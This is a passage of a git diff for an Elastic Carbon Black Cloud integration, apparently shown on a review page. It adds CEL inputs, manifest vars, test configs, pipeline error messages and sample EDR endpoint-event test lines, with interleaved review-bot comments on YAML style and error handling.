@@ -14,6 +14,61 @@ streams:
required: true
show_user: true
default: 1h
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: false
+ show_user: true
+ default: 2m
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - carbon_black_cloud-asset_vulnerability_summary
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+
+ - input: cel
+ title: Collect asset vulnerability summary from Carbon Black Cloud
+ description: Collect asset vulnerability summary from Carbon Black Cloud.
+ template_path: cel.yml.hbs
+ vars:
+ - name: interval
+ type: text
+ title: Interval
+ description: Interval to query asset vulnerability summary in Carbon Black Cloud. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 1h
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: false
+ show_user: true
+ default: 2m
- name: tags
type: text
title: Tags
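Review bot: The httpjson stream's processors var is written with `description: >` while the cel stream block added in the audit manifest hunk below, and the alert_v7 manifest at the top of this page, use `description: >-`; `>` keeps a trailing newline, so the same help text ends up differing by a line break between streams. Switching this one to `>-` would make them identical. The two new `http_client_timeout` blocks are duplicated verbatim for both streams, which is expected for per-input vars, but their unit wording ('ns, us, ms, s, m, h') differs from the interval var's ('h/m/s') directly above, which reads inconsistently in the UI.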
diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/sample_event.json b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/sample_event.json
index f3b6563ed21..c32a955c97f 100644
--- a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/sample_event.json
+++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/sample_event.json
@@ -73,4 +73,4 @@
},
"severity": "CRITICAL"
}
-}
+}
\ No newline at end of file
diff --git a/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-cel-config.yml b/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-cel-config.yml
new file mode 100644
index 00000000000..ff03928cbb3
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-cel-config.yml
@@ -0,0 +1,11 @@
+input: cel
+service: carbon_black_cloud
+vars:
+ hostname: http://{{Hostname}}:{{Port}}
+ org_key: xxxx
+ custom_api_id: xxxx
+ custom_api_secret_key: xxxx
+data_stream:
+ vars:
+ preserve_original_event: true
+ enable_request_tracer: true
diff --git a/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-default-config.yml b/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-httpjson-config.yml
similarity index 100%
rename from packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-default-config.yml
rename to packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-httpjson-config.yml
diff --git a/packages/carbon_black_cloud/data_stream/audit/agent/stream/cel.yml.hbs b/packages/carbon_black_cloud/data_stream/audit/agent/stream/cel.yml.hbs
new file mode 100644
index 00000000000..03cde15eaaf
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/audit/agent/stream/cel.yml.hbs
@@ -0,0 +1,43 @@
+config_version: 2
+interval: {{interval}}
+{{#if enable_request_tracer}}
+resource.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+resource.tracer.maxbackups: 5
+{{/if}}
+{{#if proxy_url}}
+resource.proxy_url: {{proxy_url}}
+{{/if}}
+{{#if ssl}}
+resource.ssl: {{ssl}}
+{{/if}}
+resource.url: {{hostname}}/integrationServices/v3/auditlogs
+state:
+ api_key: '{{custom_api_secret_key}}/{{custom_api_id}}'
+redact:
+ fields:
+ - api_key
+program: |
+ request("GET", (state.url)).with({
+ "Header":{
+ "Content-Type": ["application/json"],
+ "X-Auth-Token": [state.api_key],
+ },
+ }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, {
+ "events": body.notifications.map(e, {
+ "message": e.encode_json(),
+ }),
+ }))
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/carbon_black_cloud/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/audit/elasticsearch/ingest_pipeline/default.yml
index 3357178e4c3..ccc81302fd7 100644
--- a/packages/carbon_black_cloud/data_stream/audit/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/carbon_black_cloud/data_stream/audit/elasticsearch/ingest_pipeline/default.yml
@@ -23,7 +23,7 @@ processors:
field: json.eventTime
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- set:
field: event.kind
value: event
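Review bot: `body.notifications.map(...)` runs unguarded, so a response whose body carries no `notifications` key — an error body from the API, for instance — fails CEL evaluation instead of producing a readable event, and the same holds for `body.results.map(...)` in the asset_vulnerability_summary template above. Checking `resp.StatusCode` before decoding, and emitting the status and body as an error event when it is not 200, would make such failures visible in the data stream rather than only in the agent log. This template also sets no `resource.timeout`, and the audit manifest hunk below adds no `http_client_timeout` var, unlike the asset_vulnerability_summary pair; fine if intentional, but worth a sentence in the PR description.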
@@ -40,7 +40,7 @@ processors:
field: json.flagged
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- set:
field: event.outcome
value: failure
@@ -59,7 +59,7 @@ processors:
field: json.clientIp
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- append:
field: related.ip
value: '{{{client.ip}}}'
@@ -92,7 +92,7 @@ processors:
field: json.verbose
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- remove:
field: json
ignore_missing: true
@@ -124,4 +124,4 @@ on_failure:
value: pipeline_error
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
diff --git a/packages/carbon_black_cloud/data_stream/audit/manifest.yml b/packages/carbon_black_cloud/data_stream/audit/manifest.yml
index 5d0238e7087..00d34d1ba1f 100644
--- a/packages/carbon_black_cloud/data_stream/audit/manifest.yml
+++ b/packages/carbon_black_cloud/data_stream/audit/manifest.yml
@@ -40,3 +40,41 @@ streams:
description: >
Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - input: cel
+ title: Collect audit logs from Carbon Black Cloud
+ description: Collect audit logs from Carbon Black Cloud.
+ template_path: cel.yml.hbs
+ vars:
+ - name: interval
+ type: text
+ title: Interval
+ description: Interval to fetch audit logs from Carbon Black Cloud. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 1m
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - carbon_black_cloud-audit
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/carbon_black_cloud/data_stream/audit/sample_event.json b/packages/carbon_black_cloud/data_stream/audit/sample_event.json
index 852fe377add..23b9ae866cf 100644
--- a/packages/carbon_black_cloud/data_stream/audit/sample_event.json
+++ b/packages/carbon_black_cloud/data_stream/audit/sample_event.json
@@ -59,4 +59,4 @@
"forwarded",
"carbon_black_cloud-audit"
]
-}
+}
\ No newline at end of file
diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log b/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log
index 619b1a6694a..bf0fba5f89b 100644
--- a/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log
+++ b/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log
@@ -11,5 +11,10 @@ {"type":"endpoint.event.filemod","process_guid":"XXXXXXXX-003d902d-00000694-00000000-1d7540221dedd62","parent_guid":"XXXXXXXX-003d902d-00000280-00000000-1d74d6bb1e536c7","backend_timestamp":"2022-02-10 11:52:50 +0000 UTC","org_key":"XXXXXXXX","device_id":"11","device_name":"DESKTOP-011","device_external_ip":"67.43.156.13","device_os":"WINDOWS","device_group":"","action":"ACTION_FILE_MOD_OPEN | ACTION_FILE_OPEN_DELETE","schema":1,"device_timestamp":"2022-02-10 11:51:35.4434036 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":1684,"parent_pid":640,"process_publisher":[{"name":"Microsoft Corporation","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\windowsazure\\guestagent_2.7.41491.1010_2021-05-11_233023\\guestagent\\windowsazureguestagent.exe","parent_path":"c:\\windows\\system32\\services.exe","process_hash":["03dd698da2671383c9b4f868c9931879","44a1975b2197484bb22a0eb673e67e7ee9ec20265e9f6347f5e06b6447ac82c5"],"parent_hash":["fae441a6ec7fd8f55a404797a25c8910","70d7571253e091f646f78a4dd078ce7fe8d796625bfa3c0a466df03971175fb4"],"process_cmdline":"C:\\WindowsAzure\\GuestAgent_2.7.41491.1010_2021-05-11_233023\\GuestAgent\\WindowsAzureGuestAgent.exe","parent_cmdline":"C:\\windows\\system32\\services.exe","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","filemod_hash":["",""],"filemod_name":"c:\\windowsazure\\logs\\aggregatestatus\\aggregatestatus_20220210114710865.json"} {"type":"endpoint.event.filemod","process_guid":"XXXXXXXX-003dd2d5-00000a24-00000000-1d81e7447aed7aa","parent_guid":"XXXXXXXX-003dd2d5-00000ce4-00000000-1d7d6729f74b35a","backend_timestamp":"2022-02-10 11:50:50 +0000 UTC","org_key":"XXXXXXXX","device_id":"13","device_name":"DESKTOP-012","device_external_ip":"67.43.156.14","device_os":"WINDOWS","device_group":"","action":"ACTION_FILE_MOD_OPEN | 
ACTION_FILE_OPEN_READ | ACTION_FILE_OPEN_WRITE","schema":1,"device_timestamp":"2022-02-10 11:49:37.5392491 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":2596,"parent_pid":3300,"process_publisher":[{"name":"Carbon Black, Inc.","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\confer\\scanner\\scanhost.exe","parent_path":"c:\\program files\\confer\\repmgr.exe","process_hash":["cc18cc5d6af91226548e9049d0ea87ca","8d6ce40a49b5469a7c77aa9806be32b7d50f8f3ab8a89541750aaa0ae74b7c32"],"parent_hash":["472829d6813a5a85e3017db7d1c0d67e","903ae6b93c722f8862cc774068f284ba0d6daa823499212f1048db98255fb395"],"process_cmdline":"\"C:\\Program Files\\Confer\\scanner\\scanhost.exe\"","parent_cmdline":"\"C:\\Program Files\\Confer\\RepMgr.exe\"","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","filemod_hash":["",""],"filemod_name":"c:\\programdata\\carbonblack\\logs\\scanhost.log"} {"type":"endpoint.event.netconn","process_guid":"XXXXXXXX-003dd2d5-00000344-00000000-1d81e74160752cc","parent_guid":"XXXXXXXX-003dd2d5-00000ce4-00000000-1d7d6729f74b35a","backend_timestamp":"2022-02-10 11:50:50 +0000 UTC","org_key":"XXXXXXXX","device_id":"12","device_name":"DESKTOP-013","device_external_ip":"67.43.156.14","device_os":"WINDOWS","device_group":"","action":"ACTION_CONNECTION_CREATE","schema":1,"device_timestamp":"2022-02-10 11:48:14.2785426 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":836,"parent_pid":3300,"process_publisher":[{"name":"Carbon Black, Inc.","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\confer\\scanner\\scanhost.exe","parent_path":"c:\\program 
files\\confer\\repmgr.exe","process_hash":["cc18cc5d6af91226548e9049d0ea87ca","8d6ce40a49b5469a7c77aa9806be32b7d50f8f3ab8a89541750aaa0ae74b7c32"],"parent_hash":["472829d6813a5a85e3017db7d1c0d67e","903ae6b93c722f8862cc774068f284ba0d6daa823499212f1048db98255fb395"],"process_cmdline":"\"C:\\Program Files\\Confer\\scanner\\scanhost.exe\"","parent_cmdline":"\"C:\\Program Files\\Confer\\RepMgr.exe\"","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","remote_port":49707,"remote_ip":"127.0.0.1","local_port":62909,"local_ip":"127.0.0.1","netconn_domain":"","netconn_inbound":false,"netconn_protocol":"PROTO_TCP"} -{"type":"endpoint.event.netconn","process_guid":"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7","parent_guid":"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4","backend_timestamp":"2022-02-10 11:49:36 +0000 UTC","org_key":"XXXXXXXX","device_id":"14","device_name":"DESKTOP-014","device_external_ip":"67.43.156.12","device_os":"WINDOWS","device_group":"","action":"ACTION_CONNECTION_LISTEN","schema":1,"device_timestamp":"2022-02-10 11:45:02.8882089 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":9000,"parent_pid":720,"process_publisher":[{"name":"Stellar Cyber Inc","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\aella\\aella_conf_win_srv\\aella_conf_win_srv.exe","parent_path":"c:\\windows\\system32\\services.exe","process_hash":["6174da1a2dd7594456bbb3ae50ac5587","2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515"],"parent_hash":["d8e577bf078c45954f4531885478d5a9","dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674"],"process_cmdline":"\"C:\\Program Files\\Aella\\aella_conf_win_srv\\aella_conf_win_srv.exe\"","parent_cmdline":"C:\\WINDOWS\\system32\\services.exe","process_username":"NT 
AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","remote_port":0,"remote_ip":"127.0.0.1","local_port":9716,"local_ip":"127.0.0.1","netconn_domain":"","netconn_inbound":false,"netconn_protocol":"PROTO_TCP"} +{"type":"endpoint.event.netconn","process_guid":"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7","parent_guid":"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4","backend_timestamp":"2022-02-10 11:49:36 +0000 UTC","org_key":"XXXXXXXX","device_id":"14","device_name":"DESKTOP-014","device_external_ip":"67.43.156.12","device_os":"WINDOWS","device_group":"","action":"ACTION_CONNECTION_LISTEN","schema":1,"device_timestamp":"2022-02-10 11:45:02.8882089 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":9000,"parent_pid":720,"process_publisher":[{"name":"Stellar Cyber Inc","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\aella\\aella_conf_win_srv\\aella_conf_win_srv.exe","parent_path":"c:\\windows\\system32\\services.exe","process_hash":["6174da1a2dd7594456bbb3ae50ac5587","2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515"],"parent_hash":["d8e577bf078c45954f4531885478d5a9","dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674"],"process_cmdline":"\"C:\\Program Files\\Aella\\aella_conf_win_srv\\aella_conf_win_srv.exe\"","parent_cmdline":"C:\\WINDOWS\\system32\\services.exe","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","remote_port":9001,"remote_ip":"67.43.156.14","local_port":9716,"local_ip":"127.0.0.1","netconn_domain":"","netconn_inbound":false,"netconn_protocol":"PROTO_TCP"} +{"type":"endpoint.event.netconn","process_guid":"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7","parent_guid":"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4","backend_timestamp":"2022-02-10 11:49:36 +0000 
UTC","org_key":"XXXXXXXX","device_id":"14","device_name":"DESKTOP-014","device_external_ip":"67.43.156.12","device_os":"WINDOWS","device_group":"","action":"ACTION_CONNECTION_LISTEN","schema":1,"device_timestamp":"2022-02-10 11:45:02.8882089 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":9000,"parent_pid":720,"process_publisher":[{"name":"Stellar Cyber Inc","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\aella\\aella_conf_win_srv\\aella_conf_win_srv.exe","parent_path":"c:\\windows\\system32\\services.exe","process_hash":["6174da1a2dd7594456bbb3ae50ac5587","2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515"],"parent_hash":["d8e577bf078c45954f4531885478d5a9","dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674"],"process_cmdline":"\"C:\\Program Files\\Aella\\aella_conf_win_srv\\aella_conf_win_srv.exe\"","parent_cmdline":"C:\\WINDOWS\\system32\\services.exe","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","remote_port":9001,"remote_ip":"67.43.156.14","local_port":9716,"local_ip":"127.0.0.1","netconn_domain":"","netconn_inbound":true,"netconn_protocol":"PROTO_TCP"} {"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff32","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"15","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05.2725926 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft 
Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} +{"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"16","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05.2725926 +0000 UTC","create_time": "2022-02-10T08:03:29.540Z","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft 
monitoring agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} +{"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"16","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05.272 +0000 UTC","create_time": "2022-02-10T08:03:29.540Z","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring 
agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} +{"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"16","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05.2 +0000 UTC","create_time": "2022-02-10T08:03:29.540Z","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring 
agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} +{"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"16","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05 +0000 UTC","create_time": "2022-02-10T08:03:29.540Z","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring 
agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log-expected.json b/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log-expected.json index 93373b5e118..47e19456f48 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log-expected.json +++ 